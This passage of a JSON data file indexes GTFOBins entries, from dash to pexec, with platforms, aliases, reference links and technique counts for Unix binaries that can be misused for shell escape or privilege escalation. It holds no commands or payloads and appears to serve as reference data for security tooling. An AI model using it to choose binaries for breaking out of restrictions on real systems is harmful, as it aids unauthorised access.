ns/dash/"],"count":6},{"id":"gtfo:date","name":"date","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/date/"],"count":3},{"id":"gtfo:dc","name":"dc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dc/"],"count":3},{"id":"gtfo:dd","name":"dd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dd/"],"count":6},{"id":"gtfo:debugfs","name":"debugfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/debugfs/"],"count":3},{"id":"gtfo:dhclient","name":"dhclient","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dhclient/"],"count":2},{"id":"gtfo:dialog","name":"dialog","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dialog/"],"count":3},{"id":"gtfo:diff","name":"diff","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/diff/"],"count":6},{"id":"gtfo:dig","name":"dig","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dig/"],"count":3},{"id":"gtfo:distcc","name":"distcc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/distcc/"],"count":3},{"id":"gtfo:dmesg","name":"dmesg","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmesg/"],"count":6},{"id":"gtfo:dmidecode","name":"dmidecode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"count":1},{"id":"gtfo:dmsetup","name":"dmsetup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"count":3},{"id":"gtfo:dnf","name":"dnf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnf/"],"count":1},{"id":"gtfo:dnsmasq","name":"dnsmasq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"count":3},{"id":"gtfo:doas","name":"doas","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/doas/"],"count":2},{"id":"gtfo:docker","name":"docker","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/docker/"],"count":12},{"id":"gtfo:dos2unix","name":"dos2unix","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"count":6},{"id":"gtfo:dosbox","name":"dosbox","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dosbox/"],"count":9},{"id":"gtfo:dotnet","name":"dotnet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dotnet/"],"count":4},{"id":"gtfo:dpkg","name":"dpkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dpkg/"],"count":4},{"id":"gtfo:dstat","name":"dstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dstat/"],"count":2},{"id":"gtfo:dvips","name":"dvips","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dvips/"],"count":3},{"id":"gtfo:easy_install","name":"easy_install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easy_install/"],"count":2},{"id":"gtfo:easyrsa","name":"easyrsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"count":3},{"id":"gtfo:eb","name":"eb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eb/"],"count":2},{"id":"gtfo:ed","name":"ed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["red"],"references":["https://gtfobins.github.io/gtfobins/ed/"],"count":9},{"id":"gtfo:efax","name":"efax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/efax/"],"count":2},{"id":"gtfo:egrep","name":"egrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/egrep/"],"count":3},{"id":"gtfo:elvish","name":"elvish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/elvish/"],"count":9},{"id":"gtfo:emacs","name":"emacs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/emacs/"],"count":6},{"id":"gtfo:enscript","name":"enscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/enscript/"],"count":3},{"id":"gtfo:env","name":"env","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/env/"],"count":3},{"id":"gtfo:eqn","name":"eqn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eqn/"],"count":3},{"id":"gtfo:espeak","name":"espeak","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/espeak/"],"count":3},{"id":"gtfo:ex","name":"ex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ex/"],"count":6},{"id":"gtfo:exiftool","name":"exiftool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/exiftool/"],"count":12},{"id":"gtfo:expand","name":"expand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expand/"],"count":3},{"id":"gtfo:expect","name":"expect","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expect/"],"count":6},{"id":"gtfo:facter","name":"facter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/facter/"],"count":4},{"id":"gtfo:fail2ban-client","name":"fail2ban-client","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"count":2},{"id":"gtfo:fastfetch","name":"fastfetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"count":9},{"id":"gtfo:ffmpeg","name":"ffmpeg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"count":3},{"id":"gtfo:fgrep","name":"fgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fgrep/"],"count":3},{"id":"gtfo:file","name":"file","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/file/"],"count":6},{"id":"gtfo:find","name":"find","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/find/"],"count":9},{"id":"gtfo:finger","name":"finger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/finger/"],"count":6},{"id":"gtfo:firejail","name":"firejail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/firejail/"],"count":2},{"id":"gtfo:fish","name":"fish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fish/"],"count":3},{"id":"gtfo:flock","name":"flock","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/flock/"],"count":3},{"id":"gtfo:fmt","name":"fmt","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fmt/"],"count":6},{"id":"gtfo:fold","name":"fold","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fold/"],"count":3},{"id":"gtfo:forge","name":"forge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/forge/"],"count":3},{"id":"gtfo:fping","name":"fping","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fping/"],"count":3},{"id":"gtfo:ftp","name":"ftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ftp/"],"count":9},{"id":"gtfo:fzf","name":"fzf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fzf/"],"count":6},{"id":"gtfo:gawk","name":"gawk","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nawk"],"references":["https://gtfobins.github.io/gtfobins/gawk/"],"count":15},{"id":"gtfo:gcc","name":"gcc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["c89","c99","cc","g++"],"references":["https://gtfobins.github.io/gtfobins/gcc/"],"count":8},{"id":"gtfo:gcloud","name":"gcloud","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcloud/"],"count":3},{"id":"gtfo:gcore","name":"gcore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcore/"],"count":3},{"id":"gtfo:gdb","name":"gdb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gdb/"],"count":10},{"id":"gtfo:gem","name":"gem","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gem/"],"count":8},{"id":"gtfo:genie","name":"genie","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genie/"],"count":3},{"id":"gtfo:genisoimage","name":"genisoimage","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"count":6},{"id":"gtfo:getent","name":"getent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/getent/"],"count":2},{"id":"gtfo:ghc","name":"ghc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghc/"],"count":2},{"id":"gtfo:ghci","name":"ghci","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghci/"],"count":2},{"id":"gtfo:gimp","name":"gimp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gimp/"],"count":2},{"id":"gtfo:ginsh","name":"ginsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ginsh/"],"count":3},{"id":"gtfo:git","name":"git","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/git/"],"count":17},{"id":"gtfo:gnuplot","name":"gnuplot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"count":3},{"id":"gtfo:go","name":"go","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/go/"],"count":10},{"id":"gtfo:grc","name":"grc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grc/"],"count":2},{"id":"gtfo:grep","name":"grep","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grep/"],"count":3},{"id":"gtfo:gtester","name":"gtester","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gtester/"],"count":6},{"id":"gtfo:guile","name":"guile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/guile/"],"count":3},{"id":"gtfo:gzip","name":"gzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gzip/"],"count":4},{"id":"gtfo:hashcat","name":"hashcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hashcat/"],"count":2},{"id":"gtfo:head","name":"head","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/head/"],"count":3},{"id":"gtfo:hexdump","name":"hexdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["hd"],"references":["https://gtfobins.github.io/gtfobins/hexdump/"],"count":3},{"id":"gtfo:hg","name":"hg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hg/"],"count":3},{"id":"gtfo:highlight","name":"highlight","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/highlight/"],"count":3},{"id":"gtfo:hping3","name":"hping3","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hping3/"],"count":4},{"id":"gtfo:iconv","name":"iconv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iconv/"],"count":6},{"id":"gtfo:iftop","name":"iftop","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iftop/"],"count":3},{"id":"gtfo:install","name":"install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/install/"],"count":2},{"id":"gtfo:ionice","name":"ionice","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ionice/"],"count":3},{"id":"gtfo:ip","name":"ip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ip/"],"count":6},{"id":"gtfo:iptables-save","name":"iptables-save","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"count":1},{"id":"gtfo:irb","name":"irb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/irb/"],"count":2},{"id":"gtfo:ispell","name":"ispell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ispell/"],"count":3},{"id":"gtfo:java","name":"java","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/java/"],"count":2},{"id":"gtfo:jjs","name":"jjs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jjs/"],"count":10},{"id":"gtfo:joe","name":"joe","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/joe/"],"count":3},{"id":"gtfo:join","name":"join","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/join/"],"count":3},{"id":"gtfo:journalctl","name":"journalctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/journalctl/"],"count":2},{"id":"gtfo:jq","name":"jq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jq/"],"count":3},{"id":"gtfo:jrunscript","name":"jrunscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"count":11},{"id":"gtfo:jshell","name":"jshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jshell/"],"count":6},{"id":"gtfo:jtag","name":"jtag","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jtag/"],"count":2},{"id":"gtfo:julia","name":"julia","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/julia/"],"count":15},{"id":"gtfo:knife","name":"knife","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/knife/"],"count":2},{"id":"gtfo:ksshell","name":"ksshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksshell/"],"count":3},{"id":"gtfo:ksu","name":"ksu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksu/"],"count":1},{"id":"gtfo:kubectl","name":"kubectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/kubectl/"],"count":5},{"id":"gtfo:last","name":"last","source":"GTFOBins","platform":["Linux"],"aliases":["lastb"],"references":["https://gtfobins.github.io/gtfobins/last/"],"count":3},{"id":"gtfo:latex","name":"latex","source":"GTFOBins","platform":["Linux"],"aliases":["xelatex"],"references":["https://gtfobins.github.io/gtfobins/latex/"],"count":9},{"id":"gtfo:latexmk","name":"latexmk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/latexmk/"],"count":6},{"id":"gtfo:ld.so","name":"ld.so","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ld.so/"],"count":3},{"id":"gtfo:ldconfig","name":"ldconfig","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"count":3},{"id":"gtfo:less","name":"less","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/less/"],"count":24},{"id":"gtfo:lftp","name":"lftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lftp/"],"count":3},{"id":"gtfo:links","name":"links","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/links/"],"count":3},{"id":"gtfo:ln","name":"ln","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ln/"],"count":1},{"id":"gtfo:loginctl","name":"loginctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/loginctl/"],"count":2},{"id":"gtfo:logrotate","name":"logrotate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logrotate/"],"count":7},{"id":"gtfo:logsave","name":"logsave","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logsave/"],"count":3},{"id":"gtfo:look","name":"look","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/look/"],"count":3},{"id":"gtfo:lp","name":"lp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lp/"],"count":3},{"id":"gtfo:ltrace","name":"ltrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ltrace/"],"count":7},{"id":"gtfo:lua","name":"lua","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lua/"],"count":21},{"id":"gtfo:lualatex","name":"lualatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lualatex/"],"count":3},{"id":"gtfo:luatex","name":"luatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/luatex/"],"count":3},{"id":"gtfo:lwp-download","name":"lwp-download","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"count":8},{"id":"gtfo:lwp-request","name":"lwp-request","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"count":2},{"id":"gtfo:lxd","name":"lxd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lxd/"],"count":4},{"id":"gtfo:m4","name":"m4","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/m4/"],"count":9},{"id":"gtfo:mail","name":"mail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mail/"],"count":6},{"id":"gtfo:make","name":"make","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/make/"],"count":9},{"id":"gtfo:man","name":"man","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/man/"],"count":9},{"id":"gtfo:mawk","name":"mawk","source":"GTFOBins","platform":["Linux"],"aliases":["awk"],"references":["https://gtfobins.github.io/gtfobins/mawk/"],"count":9},{"id":"gtfo:minicom","name":"minicom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/minicom/"],"count":6},{"id":"gtfo:more","name":"more","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/more/"],"count":6},{"id":"gtfo:mosh-server","name":"mosh-server","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"count":1},{"id":"gtfo:mosquitto","name":"mosquitto","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"count":3},{"id":"gtfo:mount","name":"mount","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mount/"],"count":1},{"id":"gtfo:msfconsole","name":"msfconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"count":2},{"id":"gtfo:msgattrib","name":"msgattrib","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"count":3},{"id":"gtfo:msgcat","name":"msgcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgcat/"],"count":3},{"id":"gtfo:msgconv","name":"msgconv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgconv/"],"count":3},{"id":"gtfo:msgfilter","name":"msgfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"count":6},{"id":"gtfo:msgmerge","name":"msgmerge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"count":3},{"id":"gtfo:msguniq","name":"msguniq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msguniq/"],"count":3},{"id":"gtfo:mtr","name":"mtr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mtr/"],"count":2},{"id":"gtfo:multitime","name":"multitime","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/multitime/"],"count":3},{"id":"gtfo:mutt","name":"mutt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mutt/"],"count":2},{"id":"gtfo:mv","name":"mv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mv/"],"count":5},{"id":"gtfo:mypy","name":"mypy","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mypy/"],"count":4},{"id":"gtfo:mysql","name":"mysql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mysql/"],"count":6},{"id":"gtfo:nano","name":"nano","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["pico"],"references":["https://gtfobins.github.io/gtfobins/nano/"],"count":12},{"id":"gtfo:nasm","name":"nasm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nasm/"],"count":3},{"id":"gtfo:nc","name":"nc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nc/"],"count":18},{"id":"gtfo:ncdu","name":"ncdu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncdu/"],"count":3},{"id":"gtfo:ncftp","name":"ncftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncftp/"],"count":3},{"id":"gtfo:needrestart","name":"needrestart","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/needrestart/"],"count":2},{"id":"gtfo:neofetch","name":"neofetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/neofetch/"],"count":4},{"id":"gtfo:nft","name":"nft","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nft/"],"count":2},{"id":"gtfo:nginx","name":"nginx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nginx/"],"count":5},{"id":"gtfo:nice","name":"nice","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nice/"],"count":3},{"id":"gtfo:nl","name":"nl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nl/"],"count":3},{"id":"gtfo:nm","name":"nm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nm/"],"count":3},{"id":"gtfo:nmap","name":"nmap","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nmap/"],"count":12},{"id":"gtfo:node","name":"node","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/node/"],"count":22},{"id":"gtfo:nohup","name":"nohup","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nohup/"],"count":6},{"id":"gtfo:npm","name":"npm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/npm/"],"count":6},{"id":"gtfo:nroff","name":"nroff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nroff/"],"count":4},{"id":"gtfo:nsenter","name":"nsenter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nsenter/"],"count":3},{"id":"gtfo:ntpdate","name":"ntpdate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"count":3},{"id":"gtfo:octave","name":"octave","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/octave/"],"count":9},{"id":"gtfo:od","name":"od","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/od/"],"count":3},{"id":"gtfo:opencode","name":"opencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opencode/"],"count":5},{"id":"gtfo:openssl","name":"openssl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openssl/"],"count":21},{"id":"gtfo:openvpn","name":"openvpn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvpn/"],"count":6},{"id":"gtfo:openvt","name":"openvt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvt/"],"count":1},{"id":"gtfo:opkg","name":"opkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opkg/"],"count":1},{"id":"gtfo:pandoc","name":"pandoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pandoc/"],"count":9},{"id":"gtfo:passwd","name":"passwd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/passwd/"],"count":1},{"id":"gtfo:paste","name":"paste","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/paste/"],"count":3},{"id":"gtfo:pax","name":"pax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pax/"],"count":3},{"id":"gtfo:pdb","name":"pdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdb/"],"count":2},{"id":"gtfo:pdflatex","name":"pdflatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"count":9},{"id":"gtfo:pdftex","name":"pdftex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdftex/"],"count":3},{"id":"gtfo:perf","name":"perf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perf/"],"count":3},{"id":"gtfo:perl","name":"perl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perl/"],"count":14},{"id":"gtfo:perlbug","name":"perlbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perlbug/"],"count":2},{"id":"gtfo:pexec","name":"pexec","source":"GTFOBins","platform":["Linux","macOS"],"